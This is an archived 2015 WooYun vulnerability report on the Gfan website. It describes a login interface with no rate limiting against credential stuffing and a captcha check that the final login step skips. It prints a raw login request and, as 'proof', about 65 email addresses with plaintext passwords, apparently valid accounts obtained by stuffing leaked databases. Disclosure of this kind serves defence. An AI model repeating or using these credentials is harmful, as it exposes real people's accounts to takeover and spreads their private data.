当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109312

漏洞标题:机锋某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商:机锋网

漏洞作者: 路人甲

提交时间:2015-04-21 10:40

修复时间:2015-06-05 10:48

公开时间:2015-06-05 10:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-21: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向核心白帽子及相关领域专家公开
2015-05-11: 细节向普通白帽子公开
2015-05-21: 细节向实习白帽子公开
2015-06-05: 细节向公众公开

简要描述:

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库以大量的用户数据为基础,利用用户相同的注册习惯(相同的用户名和密码),尝试登陆其它的网站。2011年,互联网泄密事件引爆了整个信息安全界,导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括:天涯:31,758,468条,CSDN:6,428,559条,微博:4,442,915条,人人网:4,445,047条,猫扑:2,644,726条,178:9,072,819条,嘟嘟牛:13,891,418条,7K7K:18,282,404条,共1.2亿条。不管你的网站密码保护的多好,但是面对已经泄露的账号密码,撞库扫号防御还是一个相当重要的环节。

详细说明:

主站登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号
主站登陆验证码绕过。验证码只在之前的一步有验证,最后登录的时候没有验证。。这逻辑写的。。。
登录数据包如下:

POST /doLogin HTTP/1.1
Host: my.gfan.com
Proxy-Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://my.gfan.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://my.gfan.com/login?returnUrl=http://www.gfan.com/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: 
RA-Ver: 2.9.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
Connection: close
gotoUrl=http%3A%2F%2Fwww.gfan.com%2Findex.php&loginName=zhangyajun131@163%2ecom&password=57529704&authCode=


漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号.目前互联网上公开的账号都有数亿的规模,真要被利用的话危害还是很大的。

lyyarq@yeah.net	429131222
wtzjw1112@163.com	wtzjw885281112
zqdzly@tom.com	12345678
ls1277@qq.com	19880818
360412641@QQ.COM	90281972
375971709@qq.com	83030545
gwxarc@hotmail.com	072324aa
ynliliang@gmail.com	liliangS
lp2433@qq.com	369258174
zhaoxiaofeng.888@163.com	5991139989
wujiang621@gmail.com	sigon621
dgnelf@163.com	nishiwo20
jackaly@21cn.com	610054
xqygym@126.com	xuqingyu
zork@21cn.com	123456
c88@eyou.com	chen1234
toctory@263.net	78524
hjh_wz@126.com	hjhgm7679
timath@sohu.com	19831210
dxl1a@126.com	dxlzj0513
tangxinghua100@qq.com	steers19841122
zhwq3@163.com	12334566
sudy2k@gmail.com	5b8w2pck
sxycwn@sohu.com	wn19900809
cwho@21cn.com	65580321
wzxjxp@gmail.com	zjtzlhjs
aken0820@126.com	42142130999
defendmidfield@sina.com	983170
heyu-998@163.com	19821025hy
hkqx23@126.com	19850s23
dpjyg@163.com	feidong7031
xiyingze@gmail.com	19841226
frank@tekprene.com	tekprene
vickyngai@yahoo.com.hk	92540819
neverwj@163.com	wangjing
hlightd@gmail.com	houdong135245
bkr2001@163.com	bkr54127
pft911@163.com	19761113
xdbd45@qq.com	123456789yz
beizhi@nankai.edu.cn	bingbing
jin_chao@sina.com	jco123
wisdom@sina.com	wisdom73
jxx_luck@sina.com	800818
jingxinyue_2000@126.com	3249006
xy_589@126.com	x8182131y
liuzhenghui0702@yahoo.com.cn	69158089
mxp33521@126.com	959001112
zw_wuhan@163.com	79801314
404113473@qq.com	03281250
xumeng_2004@163.com	19800515
heng19861229@163.com	heng1025
416277460@qq.com	ccrr19880827
764077118@qq.com	aaa123123
zhl602418@163.com	1988602418
qiwu.zhang@gmail.com	zqwzqwzqw
wxy731@vip.qq.com	62637736
jy3204183@163.com	hjwisatc
pilipaca@126.com	85798579
maik5918@yahoo.com.cn	122545669
liuyong19850202@163.com	a121522434
hao_1033286@163.com	1033286hao
yitiaojin135@126.com	13166493747
htlr@21cn.com	wangjiaxi
tony871018@126.com	tony5212129
hong890206@163.com	8902061125
liujian313712@163.com	qq123456


屏幕快照 2015-04-20 下午10.16.36.png


屏幕快照 2015-04-20 下午10.17.09.png

修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-04-21 10:46

厂商回复:

谢谢,修复中

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-21 11:31 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    首页也打折,这是防刷rank的节奏么,不开心。